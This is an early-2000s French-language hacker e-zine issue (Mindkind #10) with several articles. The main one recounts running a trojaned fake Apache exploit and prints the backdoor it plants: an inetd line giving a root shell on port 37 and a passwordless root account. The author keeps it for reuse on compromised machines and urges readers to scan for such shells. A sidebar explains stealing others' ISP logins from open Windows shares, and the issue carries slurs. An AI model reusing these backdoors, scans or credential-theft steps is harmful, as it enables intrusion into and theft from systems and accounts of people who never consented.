  | -mindkind01.txt                                                   ||
  | -nothing94 - http://nothing94.250x.com                            ||
  \-------------------------------------------------------------------\|
    

sur ce.. aur'voir et  la prochaine. same mind-zine, same mind-server.


btw sorry pour les lectrices *potentielles*, chu pas mysogyne, 
juste un peubaveux :P~


								


 _____     _ _ ______________ _ __ __ _ _________ _ _ _______________
|     |\  |                                                          |\
| EOF | | | h3                                       h3@mindkind.org | |
|_____| | |__ _ ________ _______________ ___________________ ________| |
 \_____\|  \____________ _____________________________________________\|




   < Mindkind tales from IRC >
   
  [01:51] <LastAWAY_> menfin c fou ckon trouve dans les poubelles.
  [01:51] <init_null> des lesbienne ?
  [01:52] <LastAWAY_> non
  [01:52] <LastAWAY_> bisexuelles
  [01:52] <LastAWAY_> nazi
  [01:52] <LastAWAY_> avec des ressorts.
  [01:52] <LastAWAY_> hahaha
  [01:53] <LastAWAY_> quand ten vois ya quune chose a faire : RUNNNNNNNNNNNN

  < ----------------------- >


                                                               _________
 _ _ _______________ ___________ _______ MindKind10 __ _ __ __/        /
|                                                            /        /
| Team teso Exploit, by Wyzeman                             / 10.9   /
'          aka: Une belle gang de crosseur juif            .  ----- /
 \_ _______ ______ _____ __ __ ___________ _______________/        '
                                                         /________/



Vous croyez que les trojan c'est lame, et bien vous avez  peu  etre
raison, personnellement je serais portez a vous repondre  que  vous
avez simplement un complexe d'inferioriter si  vous  pensez  ca, et
il semblerais que team teso soit bien daccord  avec moi. Car il ont
bien resealer, non pas publiquement comme CDC et sont back orifice,
mais de facon semi private, mais surtout sournoise  un  trojan.  He 
oui, Un beau petit trojan camoufler en exploit sur un honey pot  de
team teso. Vous apprendrez dans  cette  article  la  nature  de  se 
trojan,  ce  qu'il  fait,  comment  s'en  debarasser,  et  le  plus 
interressant,  comment  s'en  servire  pour  soit.   Le  tout  sera
raconter em suivant l'ordre chronologique de mon experience avec ce 
trojan.



Bon,  le  dit  trojan a ete trouver sous la forme d'un exploit deja 
compiler  sur  le  honey  pot  de  team  teso,  comme genre, cadeau 
empoisonner  on  fait  pas  mieu.  mais  apres  tout  qu'est-ce qui 
pourrais etre  plus  suspect  qu'un  exploit  deja  compiler sur un
honney  pot  et  aucune trace du source code ? on se le demande. le 
soit  disant  exploit  vise  une  supposer   faille   du    serveur
apache 1.3.x , je  dis  supposer  exploit  car apres lavoir laisser
tourner durant 24h, aucun resultat (reussite  ou  erreur)  n'a  ete
enregistrer.  Ce  qui laise porter a croire  que  l'exploit ne fait 
qu'installer le dit trojan et nexploit rien du tout. Lancon donc le 
dit exploit.


bash-2.05# ./7350steak.bin
7350steak - Remote nobody exploit for apache-1.3.x (linux) by lorian
Usage: ./7350steak <host>
password:
invalid key
bash-2.05# cat pass
you-cant-code
bash-2.05# ./7350steak.bin
7350steak - Remote nobody exploit for apache-1.3.x (linux) by lorian
Usage: ./7350steak <host>
password:
./7350steak.bin <target>
bash-2.05#


bon, je fais ici une pause pour vous rappellez que je vous fait  un 
remake authentique de mon experience, incluant mes erreurs  stupide
de guessage. et quoi de plus suspect qu'un  exploit  pres  compiler
sur un honey pot qui demande un pass et que  le  pass  en  question
est "you-cant-code" ? on se le demande.


bash-2.05# ./7350steak.bin pedalomedia.com
7350steak - Remote nobody exploit for apache-1.3.x (linux) by lorian
Usage: ./7350steak <host>
password:
++ sending exploit code...
++ Brute forcing offset
++ wait...
sh: /bin/mail: No such file or directory
sh: /bin/mail: No such file or directory


bon, alors, quoi de plus suspect qu'un exploit precompiler  sur  un
honney pot qui demande un mot de passe et que le mot  de  passe  en
question est "you-cant-code" et qui de surcrois  demande  que  mail
soit installer ? Et bien on peu toujours etre naif  et  croire  qui
vous nous emailer a root afin de nous donner le  resultat  ou  nous
avertir plus que le "bruteforcing offset  semble  long". et surtout
lexploit a pas lair de rien faire (pour lavoir  laisser  tourner 30
minute avant dme decider a installer mail).  Par  contre,  je  fais
ici une breche dans lunivers espace temps pour vous avertir que  le
3/4 du mal est deja faite, en fait le seul mal qui na pas ete  fait
cest que le mail (mouais stun pseudo  jeux  de  mots),  qui  averti
team teso que vous etes infectez nest  pas  parti (messemble qu'une
connection socket a un cgi aurais eu lair  moin  suspect,  mais qui
suis-je pour oser reprimender un trojan de  team  teso ?  jai  meme
pas  de  dec).  donc  apres  avoir  installer  mail,  jai  relancer 
l'exploit.


bash-2.05# ./7350steak.bin pedalomedia.com
7350steak - Remote nobody exploit for apache-1.3.x (linux) by lorian
Usage: ./7350steak <host>
password:
++ sending exploit code...
++ Brute forcing offset
++ wait...


ps:  pedalomedia c'est le site du syndicat des enculers de tech  de
videotron.  evidament  je m'en sert ici qu'a titre exemplair, allez
pas croire que....

et jai laisser tourner tourner tourner et tourner,  jusqua  ce  que
je dise en joke sur #mindkind et si cetais un trojan.  N'y  croyant
pas trop, mais m'ayant faite peur a moi meme, j'ai  decider  de  me
scanner au cas ou. En fait je me disais, messemble  que  sa  serais 
drole, et bien je l'ai  trouver  moin drole  que prevu quand jai vu
le resultat du scan.


bash-2.05# nmap -sS -P0 localhost

Starting nmap V. 2.54BETA37 ( www.insecure.org/nmap/ )
Interesting ports on localhost (127.0.0.1):
(The 1591 ports scanned but not shown below are in state: closed)
Port       State       Service
21/tcp     open        ftp
22/tcp     open        ssh
37/tcp     open        time
80/tcp     open        http
113/tcp    open        auth
139/tcp    open        netbios-ssn
3306/tcp   open        mysql
6000/tcp   open        X11


Nmap run completed -- 1 IP address (1 host up) scanned in 1 second
bash-2.05# 

drole, et bien je l'ai  trouver  moin drole  que prevu quand jai vu

C'est  a  peu  pret  la  que  mon  sang  a  virer  au vinaigre. Car 
connaissant  bien  ma machine (c'est moi qui la setuper apres tout, 
javais jamais ouver le service TIME (jpas un departement de rolex). 
Et dailleur une  visite  rapide  de mon /etc/inetd.conf me confirma
la chose, et me derouta d'autant plus.

#time   stream  tcp     nowait  root    internal
#time   dgram   udp     wait    root    internal




les deux ligne etant effectivement commenter, comment mon port time
peu t'il etre ouvert ? jai rebooter au cas ou que ca aurait  ete un 
simple  process  (trop  lache  pour  guesser a partir dun ps -aux).
evidament comme jmen doutais et que vous vous  doutez  surement  ca 
rien changer, mon port 37 etais toujours  aussi  ouvert.  jai  donc 
decider de le telneter pour avoir le coeur net 

bash-2.05# telnet localhost 37
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
sh-2.05#



le trojan ouvre dont un shell sh automatiquement, sans login  rien.
ne sachant pas trop par ou commencer je lai firewaller (car  je  me 
doutais bien que team-teso avait recu un email de  plus  dans  leur
boite a male). Ensuite  jai  decider  de  faire  un  find  sur  les 
executables root qui aurais pu etre modifier. 


bash-2.05# find / \( -perm -02000 -o -perm -04000 \) -ls
504848   35 -rws--x--x   1 root     bin         35248 May 30  2001 /usr/bin/at
504849   11 -rws--x--x   1 root     bin         10592 May 30  2001 /usr/bin/crontab
504910   11 -rws--x--x   1 root     bin         11244 Apr 15  2001 /usr/bin/disable-paste
505013   33 -rws--x--x   1 root     bin         33760 Jun 18  2000 /usr/bin/chage
505014   29 -rws--x--x   1 root     bin         29572 Jun 18  2000 /usr/bin/chfn
505015   27 -rws--x--x   1 root     bin         27188 Jun 18  2000 /usr/bin/chsh
505016   18 -rws--x--x   1 root     bin         17584 Jun 18  2000 /usr/bin/expiry
505017   34 -rws--x--x   1 root     bin         34212 Jun 18  2000 /usr/bin/gpasswd
505018   20 -rws--x--x   1 root     bin         20368 Jun 18  2000 /usr/bin/newgrp
505019   35 -rws--x--x   1 root     bin         35620 Jun 18  2000 /usr/bin/passwd
505069   10 -r-xr-sr-x   1 root     tty          9768 Jun 21  2001 /usr/bin/wall



and so on (je listerais pas toute pour vous faire plaisir, et  puis 
ca  prendrais  un  peu  trop  de  place  pour  l'importance  reel).
Finalement aucun executable root navais  ete  modifier  la  journee
ou l'exploit/trojan a ete lancer.  Par  la  suite, j'ai effacer mon
inetd et remplacer  par  une  version  plus recente (spa la version
plus  recente  qui  est  important  mais  le fait de changer), mais
comme de fait, ca na  rien  modifier. Au  desespoir  je  me  coucha 
donc la dessus, et  de  fut  le  lendemain  midi  que  la  solution
m'apparue,  Je  re-ouvris mon fichier /etc/inetd.conf et  m'appercu
que le petit trojan avait rajouter une ligne a la toute fin.


time    stream  tcp     nowait  root    /bin/sh sh -i

cetais  donc  ca.  Quand  meme efficace pour 1 lignes non ? mais ce 
n'est pas tout, l'exploit/trojan ajoute aussi un user operator sans 
password dans le /etc/passwd :

operator::0:0:operator:/root:/bin/bash

et bien, laissez moi vous dire que ca pas ete long que je  me  suis 
debarrasser de ca. jai deleter laccompte operator  et jai commenter 
la ligne du time dans mon inetd.conf et  j'ai  rebooter  mon inetd. 
(ca cest comment se debarraser du trojan (mouais jen ai deja vu des 
plus compliquer, javous)).  Pourquoi  jai  juste commenter la ligne 
"time" ? et bien pour pas  avoir  a m'en souvenir si jvoullais m'en 
servire  plus  tard,  apres  tout  ca  fait  une  exelente backdoor 
lorsqu'on  root  une  box,   on   va   pas   fouiller   dans   sont 
/etc/inetd.conf a toute les jours. 


Bon  comme  j'etais  pas rassasier, et que je desirais prendre  une 
revange  spirituelle  sur  team-teso. j'ai  decider  de   re-runner 
l'exploit et de sniffer les packets avec snort(question  de  savoir 
a qui le mail allais). voici sque ca donner :

73 32 35 36 2D 63 62 63 2C 72 69 6A 6E 64 61 65  s256-cbc,rijndae
6C 2D 63 62 63 40 6C 79 73 61 74 6F 72 2E 6C 69  l-cbc@lysator.li
75 2E 73 65 00 00 00 66 61 65 73 31 32 38 2D 63  u.se...faes128-c
62 63 2C 33 64 65 73 2D 63 62 63 2C 62 6C 6F 77  bc,3des-cbc,blow
66 69 73 68 2D 63 62 63 2C 63 61 73 74 31 32 38  fish-cbc,cast128
2D 63 62 63 2C 61 72 63 66 6F 75 72 2C 61 65 73  -cbc,arcfour,aes
31 39 32 2D 63 62 63 2C 61 65 73 32 35 36 2D 63  192-cbc,aes256-c
62 63 2C 72 69 6A 6E 64 61 65 6C 2D 63 62 63 40  bc,rijndael-cbc@
6C 79 73 61 74 6F 72 2E 6C 69 75 2E 73 65 00 00  lysator.liu.se..



enfin la parti interressante, ca nous apprend en gros que ca envoie
le email a rijndael-cbc@lysator.liu.se 

jai  donc  envoyer  un email pour le remercier de mavoir donner une
backdoor si leet et assouvir  ma  soif  de  vangeance.  Apres  j'ai 
scanner  une  bonne parti des class B des isp majeur quebecois pour 
voir si  jetais  le  seul tata a avoir runner ca. il semblerais que 
oui, mais je suis loin d'avoir scanner toute internet. vous pourrez 
donc vous  aussi  scanner  un  peu  partout  a la recherche d'un sh 
sur le port 37, bonne chance.




 _____     _ _ ______________ _ __ __ _ _________ _ _ _______________
|     |\  |                                                          |\
| EOF | | | Wyzeman                             wyzeman@mindkind.org | |
|_____| | |__ _ ________ _______________ ___________________ ________| |
 \_____\|  \____________ _____________________________________________\|





          .___. ._.              .._. _.              .
          ||V|._.._.._.   /|||/|._.._.._.   /|
          ||      |[]|\||   | || `  |[]| \| |   | |
          ||  |v| ||||  ` |_.-l ||   C:|||  ` |_.-l |_.
          ||  | | || ||   || 0  ||   || ||   || 0  |8o
          ||__| |_||_||_|\_||____||_|\_||_||_|\_||____|08 ~ ~
          `` ```````````` ``````````\0
            ` `` `  ``
                      http://mindkind.org:8787/




                                                               _________
 _ _ _______________ ___________ _______ MindKind10 __ _ __ __/        /
|                                                            /        /
| et si on perlais de perl ?, by LastCall_                  / 10.10  /
'          aka: genre la suite du #1 dans le #1            .  ----- /
 \_ _______ ______ _____ __ __ ___________ _______________/        '
                                                         /________/

Lors de la premire partie de cette chronique MindKind, j'ai trait en long  et
en large des variables. "Big deal" me direz vous, cependant plus vous y penser,
plus les variables ont un plan important et en Perl ils peuvent  tre  beaucoup
plus complexes que dans tout autre langage populaire (tel que le C ou le Basic)
Bon ok, j'avoue que c'est poche juste dclarer des variables avec my ou local.
Wait a minute... ah j'en ai pas parl!

Vous vous rappelez donc que la ligne 
$meuh = 0;
cre une variable. Pour la plupart du monde a fait comme en  VB  pas  d'Option
Explicit.  Par contre ceux qui code en C  ou  C++  (ceux  qui  font  des  vrais
programme donc, heh) sont habitus de toujours avoir  dclarer les variables 
qqpart. Pourquoi? Comme c'est la j'en vois deux raisons videntes: pour choisir
un scope  la variable, et pour rgler des problmes du genre "ah je suis toute
fuck dans mon code". Comme preuve observons ce que c'est qu'un scope  :  C'est
une porte pour la variable, exemple: si je  dclare  $meuh;  dans  une  boucle
while il va exister seulement dans cette boucle, sauf que Perl est  intelligent
et va mettre la variable globale si tu l'utilise en dehors de la  boucle,  mais
a d'lair qui va la mettre globale nyways paske y cave(j'ai toujours des aussi
bons arguments, heh). Donc tant qu'a tre tout fourr, le dompteur  de  chameau
expriment va mettre des my devant les variables pour  les  associer  avec  le
scope courrant. Donc un my $meuh; dans une boucle va garder le $meuh pour cette
boucle, mme chose pour des sous-routines. Pour une variable globale,  juste  
mettre "our"  la place de "my". Pour localiser une variable globale, il  suffi
de la dclarer avec local. Un local sert donc  ne pas toucher au contenu d'une
variable globale dans une sous-routine. Pratique  quand  on  aime  utiliser  la
variable $a.. heh. Bon maintenant que vous  savez  comment  la  dclaration  de
variables marche, vous pouvez mettre use strict; au dbut de  vos  scripts.  Ce
pragma la (a part de rimmer avec "la", un pragma c't'une commande  qu'on  donne
au compilateur) sert  faire le fameux "Option explicit" en VB,  donc  force  
dclarer toute variable, fatigant mais pratique.  Bon  quoi  d'autres  sur  les
variables.. ah, $_ et les autres variables spciales. Prochain article p-e. :-P


Ben oui c'est un oprateur

Tel que promis dans cet article number two, on va regarder les oprateurs. Y'en
a beaucoup. Et c'est loin d'tre juste + - / * qui sont compts comme oprateur
en Perl.. mme les " en sont un  quand  on  y  pense...  (oui  qq//  vous  vous
rappelez? qq est un oprateur, avec " il est implicite.. ouf).

Je crois pas que j'ai besoin de faire un speech de 2 heures sur + - / *  ++  --
dans le cas d'oprations mathmatiques avec des nombres. La  chose  qu'il  faut
savoir : Perl s'occupe de tout! Vu  que  les  types  int,  String,  long,  etc.
n'existent pas en Perl, perl s'occupe lui-mme de faire de faire la conversion,
donc il s'amuse comme il veut avec les variables.  print "meuh" + 5  va  donner
5 comme rsultat.. print "4.5" + 5 va donner 9.5, il faut remarquer  que  "4.5"
c'est une string et que 5 c'est un nombre! auto-conversion ici!

Ce qui a d'intressent en Perl, c'est les oprateurs de comparaisons. Y'en a un
beau paquet. Bien sure ya < > >= <= == !=. Mais a c'est quand on veut le faire
sur des nombres, quand on veut s'amuser avec les String, on utilise eq ne gt ge
je crois que a vaut la peine que je fasse un petit tableau! (qui est
totalement ripped off de mon autre article de vla 1 an et demi :-P)


||
|  Nombre     String      ce que c'est:                     |
||
|    ==         eq     gal                                |
|    !=         ne     pas gal                            |
|    <=>        cmp    retourne -1 si a gauche c plus bas,  |
|                      +1 si plus haut et 0 si gal.        |
|    >          gt     Plus grand                           |
|    >=         ge     Plus grand ou gal                   |
|    <          lt     Plus petit                           |
|    <=         le     Plus petit ou gal                   |
|___________________________________________________________|


videmment il y a aussi tout les oprateurs boolens && || ! en double! Pkoi en
double? ben parce qu'on a aussi and or et not.. La raison est  simple  avec  un
exemple, parfois on veut utiliser un or avec une prcdence moins forte.  hein?
ok ne pas capoter, rappeler vous en math (et en prog) que le *  est  plus  fort
que le +, bien c'est pareil pour les oprateurs en Perl. Dans  le  cas  prsent
les or sont plus faibles que les ||. Par contre , vient dans le  millieu  (donc
|| est plus fort que , qui est plus fort que or), donc dans le cas  prsent  on
peut se permettre de faire open FILE, "machin" or die; tandis qu'avec le ||  on
est oblig de mettre des () car le || est plus fort que ,  donc  Perl  voit  a
comme : J'ouvre avec handle FILE. J'ouvre quoi? machin ou die.  Au  lieu  de  :
J'ouvre avec le handle FILE le fichier machin, ou je crve (ce qui devrait tre
le cas). Donc il est vidant que les () changent les choses, car  ce  sont  les
oprateurs les plus puissants. Par contre, il ne faut pas trop  vite  sauter  
cette conclusion, en Perl on prfre dire que () fait des appels  de  fonction,
donc open(FILE, "machin") est un appel de la fonction open. Simple.

 part les oprateurs bitwise (pour manipuler des bits [gros inside ici] ;-) &
et | il y a un paquet d'autres oprateurs "standards" que vous allez retrouvez
dans le tableau un peu plus loin. Il y a .. ... x =~ et !~ d'intressants.

=~ et !~ permettent tout simplement de comparer une string avec un  regex.   La
ligne suivante $meuh =~ /haha/; va retourner true  si  haha  est  contenu  dans
$meuh. Je vais revenir sur les regex dans un futur article, car c'est  une  des
grandes puissances de Perl; l'engine de regex est tout simplement gnial.

x permet de rpter la mme chose. Donc si vous  voulez  faire  de  la  payload
injection de "a" vous faite print "a" x 99999999999999999999; et  le  tour  est
jou! 99999999999999999999 "a" d'imprims!  vous la connaissance unique!

.. et ... permette de faire une suite. Par exemple for (1..10) { print; }  loop
de 1 a 10 et print a. En plus ta, .. et ... testent si la  valeur  de  droite
est vrai (sinon ils n'excutent pas l'itration). C'est la  qu'on  retrouve  la
diffrence entre .. et ..., ce dernier  skip  la  premire  comparaison.   J'ai
malheureusement pas russi  inventer de quoi de pratique pour a.. 

Bon vu que vous aimez le cot esthtique de mes merveilleux  tableaux  (arrter
de m'envoyer des emails de menaces qui disent que mes ASCII sont laids, merci);
voici le big tableau des oprateur!


||
|  Liste des oprateurs par prcdence (dcroissante)  |
||
|                        (  )                          |
|                         ->                           |
|                       ++  --                         |
|                         **                           |
|               ! ~ \ et le + - unaires                |
|                       =~ !~                          |
|                      * / % x                         |
|                       + - .                          |
|                       <<  >>                         |
|                < > <= >= lt gt le ge                 |
|                 == != <=> eq ne cmp                  |
|                         &                            |
|                        |  ^                          |
|                         &&                           |
|                         ||                           |
|                       .. ...                         |
|                         ?:                           |
|                  = += -= *= (et etc.)                |
|                        , =>                          |
|                        not                           |
|                        and                           |
|                       or xor                         |
|______________________________________________________|
    Brought to you by the Mindkind-ASCII-laid dept.

[Note de Last: Trouvez pas que cte ASCII la ressemble  un totem? haha]

Unaires? ouais.. traduction LastCall_ de unary.. il y a des oprateurs comme a
qui s'appliquent juste  un lment et non 2.. genre ++ est le plus  populaire.
D'habitude un oprateur est binary (2 oprandes), genre 2 * 2. Il y  en  a  des
tertiaires aussi, comme ? : (pareil comme en C);

Il est aussi  noter que le . fait la concatnation(mot  10$) de strings!


Affaire weird du moment

J'aurais d en parler dans mon prcdent article,  mais  mieux  vaut  tard  que
jamais! Vous vous rappelez de $pwet = "meuh"; ? Et bien admetton  que  je  veux
assigner une variable de plusieurs lignes sans crire les \n? Qu'est-ce que  je
fais? Et bien ta juste  faire un here document! Voici de quoi a la d'lair :
$pwet = <<MACHIN;
meuh
meuh
MACHIN
La variable pwet va tre remplie avec tout ce qui qui se trouve jusqu'au  label
MACHIN. Bon ok on peut faire la mme chose avec
$pwet = "meuh
meuh";
Mais on peut quand mme crire ce qu'on veut aprs le   <<MACHIN; ,  chose  qui
apparat trop loin quand on a 100ko de shits dans notre here document. Exemple:
print <<'MACHIN' x 10;
haha
hihi 10$
hoho
MACHIN
Remarquez les '', on peut les utiliser dans le mme genre que print '10$';. Par
dfaut on fait comme si c'tait "". 


Conclusion

Si vous avez des questions, ou que vous voulez savoir de quoi au  sujet  de  ce
que j'ai parl dans mes chroniques et que  vous  tes  trop  vedge  pour  aller
chercher a sur le web, envoyez moi un email  lastcall@mindkind.org et je vais
prendre tout a en note pour en traiter  dans  ma  chronique.   videmment,  si
personne m'envoie de email, je vais supposer que tout tait trs clair et  t
comprit  110% par tout le monde, et  oui  mme  par  toi  Rodrigue.   Sur  ce,
n'oublier pas que j'utilise la mthode lente et  en  profondeur  pour  explorer
Perl... il est possible d'all plus rapidement pour produire quelque  chose  de
fonctionnel (exemple: un script CGI), mais sachez que ma mthode nous permet de
mieux apprcier le Perl. [ Note from LastCall_: plus j'y  pense  plus  que  les
filles apprcie aussi cette mthode, vous savez, tout est apprciation HAHA!! ]
Bon, nyways amusez vous bien, car oui programmer c le fun! (quand on aime a.) 




 _____     _ _ ______________ _ __ __ _ _________ _ _ _______________
|     |\  |                                                          |\
| EOF | | | LastCall_                          lastcall@mindkind.org | |
|_____| | |__ _ ________ _______________ ___________________ ________| |
 \_____\|  \____________ _____________________________________________\|





        ____         ,-------------------------------------------------
       /    \        | Vous trouvez que les programmes nazis qui utilisent
      |  _   |       | vi comme default editor a suxx (genre edquota)? 
      | / \  |       | Et bien vous n'etes pas les seuls, nous aussi. 
      ||   | |      /  Alors voici un petit truc simple pour viter ce 
      (.) (.)|     /   genre de situation inconfortable
      ||   | |    <__  
      ||   | | |     | tapez en console avant de lancez votre apps
      ||   | | |     | 
      |____/|| |     | export EDITOR=pico
      |\___/ | |     |  
      ||   | | |     | c'est tout. so fucking hard hein ? 
      ||   | | |     | 
      ||   | | |     |   
      ||     | |       
      | \___/  |      
      |        |       
       \______/        





                                                               _________
 _ _ _______________ ___________ _______ MindKind10 __ _ __ __/        /
|                                                            /        /
| article hyponyme, by boredom2k                            / 10.11  /
'          aka: quand ya pas de titre ya pas de titre      .  ----- /
 \_ _______ ______ _____ __ __ ___________ _______________/        '
                                                         /________/


Plusieurs personnes que je croise sur la rue, m'arrtent et me demandent si je
ferai finalement un autre update  loufoque et  divertissant  qui  rptera  la
mme calis de chose, mais d'une autre faon. Bien sur, dans ma  grande  nature
de bnvolance et d'infini  partage, je  divulguerai les grands secrets de  ce
monde...  de  l'anne  2002!  car  Dieu seul  sait  qu'elle  sera  la  mode en
philosophie l'anne prochain.  Donc, si vous  voulez avoir du  succs chez les
femmes, ou vous voulez savoir qu'elles seront les  nouvelles  mondes  dans  le
futur  (pour "tre la avant que a devienne populaire,  yo"  (qui  revient  au
premier point)), vous tes exactement  la bonne place. Exactement.

Il est  premirement sous-entendu  qu'il y  a autant  de "ralits"  qu'il y a
d'"individus" qui peut "la" percevoir  "et" "par" "ce" fait mme,  d'opinions.
Une thorie dj globalement accept  (j'aimerais pas tre dans  vos  souliers
si vous  acceptez pas  ce simple  concept, mes  pieds sont  grand), mais qui a
malheureusement crer une attitude/mentalit pathtique qui, mais, mais,  mais
QUI je  suis pour  juger l'opinion  de quelqu'un  d'autre? Tout le monde a son
propre opinion et la  vie est belle et  je sautille gaiement dans un champs de
fleurs et des gnomes font tout le travail pendant que je sirote un jus sur mon
balcon. videmment, il est, aussi, absurde de croire qu'aucun grand systme de
moral affecte MA (emphase sur moi) vie.

Croire que tous les humains sont uniques est une faon comme une autre pour ce
rconforter et donner du  sens  son existence.  Comme d'agir "de sa  manire"
pour attirer l'attention  du monde et  avoir l'impression d'exister  (dans les
ralits des autres spectateurs) (l'individualisme  baby!  Dommage  que  cette
mode la soit termine.) Si ma mmoire est bonne, la Terre est plate et, oh  mon
dieu, n'est pas le centre de l'univers!   Quel  choc!   Maintenant  rions  des
fundamentalists chrtiens qui croient encore au crationnisme! Ha ha ha, comme
c'est stupide!  CONFORMISTES !  Ha, ha.  Combien de  point d'acceptance aie-je
gagn?

Parce que videmment on est au top  de notre volution et toute la vrit  est
maintenant affich devant nos yeux. Comme dans l'Antiquit! ROCK ON SOCRATE.

Le point tait  que l'tre humain  ou l'humanit n'est  pas spcial. En  rgle
gnral un humain a un bon % de pouvoir pour agir dans une socit, c'est tout
Facile  accepter. Le 2me  point est que l'individu ou  l'individualit n'est
pas spcial : une opinion est inutile,  une morale  aussi (Si  vous vouliez de
l'ironie en voila en vrac) Le rsultat compte. Plus facile  s'imaginer si  on
adopte une doctrine qui prne la logique.

La ralit,  le monde,  tout, est  seulement une  palette de  sens qu'on  peut
peroit avec notre corps. Tu peux voir de cette couleur la  celle la, tu peux
entendre de ce  son la a  lui, sentir de  a  a...  et si t'est  pas content
trouve toi un  autre corps osti.  Le monde peru  peut trs bien  tre rel ou
pas. C'est aucunement rvlant parce que  c'est vous qui avez le dernier  mot,
thoriquement, avant la projection finale dans la tte.

Et pour ajouter a  l'injure, dites-vous que vous  tes trs restreint dans  ce
que  vous pouvez  capter comme  perceptions, anyway  c'est pas  comme si  vous
alliez vous en servir, bande d'animaux.

 ce point, pourquoi vivre? Je  pourrais sombrer dans le ngativisme et  prier
pour une mort rapide. Comme dj dit, aucune morale est universellement bonne,
parce que  universellement, il  n'y a  pas de morale. Par contre  (new  school
boredom2k baby!) une chose est sur: un point de vue peut tre  demontr  comme
"plus efficace" ou "plus fonctionnel" qu'un autre, logiquement.

On ne peut pas nier que le trajet le plus simple entre 2 points est une  ligne
(pour l'instant, a moin qu'on plit le  feuille! ho ho ho ho, comme dans  Event
Horizon !  hum.), meme  si ce  principe est  logiquement accept,  dans le vie
courrante rien ne (peut) fonctionner comme ca. Je prends grand plaisir a  rire
des choix illogiques,  qui pourrait aisement  etre resolu en  quelque chose de
beaucoup plus efficace, tout calcul prit en compte (sauf les moeurs sociaux)

Un exemple serait 2 chemins qui passent chacun dans  une fort, tout  le monde
prend un seul chemin: le plus  long. On leur demande pourquoi il  ne prendrait
pas le chemin plus court et  techniquement aussi safe:  1- "parce que  l'autre
chemin est hante!" - (moeurs sociaux) 2- "parce que j'ai pas le droit!" - (la
loi)

Alors qu'est-ce que la personne logique  ferait?! 1- Le pousser  terre  et le
botter dans la face en le  ridiculisant pour sa stupidit 2- Critiquer  la loi
et  le  gouvernement,  en  placant  le  plus  souvent  possible  des remarques
dsobligeantes envers eux, dans  l'espoir que l'histoire se  rpande. Exagrer
ses  points   l'extrme, mme  si a  reprsente pas son opinion personnelle,
anyway son opinion personnel vaut rien, meme a ses propres yeux. Right? 

On ne  peut rien  perdre dans  cette optique,  peut-tre de  la comptition va
apparatre et essayer de me contredire, chacun des camps vont tjrs essayer  de
mieux s'armer, et du "progrs" ce fera de ce fait mme. Peut-tre que le monde
va  graduellement  changer et  donner  un meilleur  environnement  social pour
encore, "progresser". Et si a se  fait pas je serai tout de  mme extrmement
satisfait du sacrifice que  j'ai fait. S'oublier soit  mme pour faire un  pas
vers l'universalit: irrvelant  dans le grand  schma, mais  ass  symbolique
pour mourir les yeux ouvert et en riant comme si c'tait  la  meilleure  qu'on
est jamais entendu.

Honorablement, mme si ironique.

Finalement, on vie pour avoir la "meilleur" mort possible, ton "meilleur"  est
mieux d'tre solide, parce que je vais me  faire  un  plaisir  d'aller  botter
toute a  terre.. et a va tre de TA faute. Pour finir voici une phrase  que
je trouve divertissante intellectuellement :

SPEAK FRENCH OR DIE.


 _____     _ _ ______________ _ __ __ _ _________ _ _ _______________
|     |\  |                                                          |\
| EOF | | | boredom2k                                                | |
|_____| | |__ _ ________ _______________ ___________________ ________| |
 \_____\|  \____________ _____________________________________________\|






        ____         ,-------------------------------------------------
       /    \        | La fin justifie les moyens.  
      |  _   |       | 
      | / \  |       | Vous en avez plein le cul de votre ratio de 6g
      ||   | |      /  chez sympatico ? aprs tout, vous downloadiez
      (.) (.)|     /   probablement deja plus que ca avec votre 56k
      ||   | |    <__  (bon ok, c short un peu). Neanmoin, Mindkind
      ||   | | |     | a apris un moyen simple (mais avouons le, pas
      ||   | | |     | trs lgal). C'est tellement simple que ces a
      |____/|| |     | s'en pter la tte sur le mur. Vous navez qua
      |\___/ | |     | prendre le login/pass de quelqu'un d'autre et
      ||   | | |     | c'est sont quota a lui que vous allez buster.
      ||   | | |     | Wow merci, mais comment jfais pour prendre le
      ||   | | |     | login/pass et bien encore une foi, cest simple
      ||     | |       a se peter squi nous reste de tete sur squi 
      | \___/  |       reste de mur. Apres 7 ans, le monde on toujours
      |        |       pas compris que le sharing de fichier, c'est 
       \______/        hum disont, universel. donc on voit encore
                       une multitude de C:\ sharer at will. tout ce
                       qui reste a faire c'est dallez recuperer le 
                       fichier EnterNet.ini qui se trouve generalement
                       dans un des 2 path suivant :
                       program file/sympatico/access manager/app/
                       program file/sympatico/app/
                       le password etant judicieusement encrypter,
                       vous devez le decrypter avec Revelator, qui
                       ne marche bien sur que sous win9x (life).
                       vous devez aussi installer access manager.

                       ps: notre etude rapporte quon peu meme trouver
                       des enternet.ini sur kazaa :|




                                                               _________
 _ _ _______________ ___________ _______ MindKind10 __ _ __ __/        /
|                                                            /        /
| Armoring Slackware 2, by Wyzeman                          / 10.12  /
'          aka: Active and pro Active counter mesure       .  ----- /
 \_ _______ ______ _____ __ __ ___________ _______________/        '
                                                         /________/



Cette article est en quelque sorte une suite a mon premier article 
sur la securiter de slackware paru dans mindkind 1. Pourquoi juste
un peu la suite ? He bien le premiere article parlais des bases de
la securite. cette article etant la  notion  de  securiter  a  une
maniere pro active, par l'utilisation dun IDS (snort), mais  aussi
je mettendrais sur une utilisation un peu plus  MaD  admin  de  se 
logiciel, c'est  a dire le sniffing de packet. Cette article n'est 
pas non plus a proprement parler un HoW-To  snort, car le site web
contient  une  exelente  documentation online, mais je survolerais
quand meme les quelques commande util pour  un  "get started",  Ce 
qu'offre surtout  cette  article,  ce  sont  2 petit script php en 
version  beta  portant sur chacun  des  2  facon d'utiliser snort. 
Ces 2 code on pour principale  but de faciliter la vie. Ils seront
aussi disponbile  sur  le CVS de Mindkind, vous pourrez ainsi donc
facilement  vous procurez  les  updates  au fur et a mesure que le 
code evolura,  ou  voir  meme  proposez vos propre modification et
amelioration.



part 1: I wanna be the admin who snif 500k of log for u.
        and i would snif 500 more if it's needed.
	

une  des  particulariters   interressante  de   snort   est   sont
utilisation en tant que sniffer de packet. Dailleur, c'est la base
de  tout  les  IDS,  sniffer  les  packets,  pour  identifiez  les 
mechants, mais c plaisant de pouvoir  samuser  avec  aussi.  Cette
premiere parti  de  l'article  demontrera  comment  s'amuser  avec
snort et donnera  quelque expemple  sur un reseau local. Evidament
cest plutot limiter si vous faites  ca  chez vous, vous recolterez
a la limite  assez  d'information  pour faire chier votre frere ou
votre soeur ou  whatever  sque  la  genetique a engendrer, mais ca 
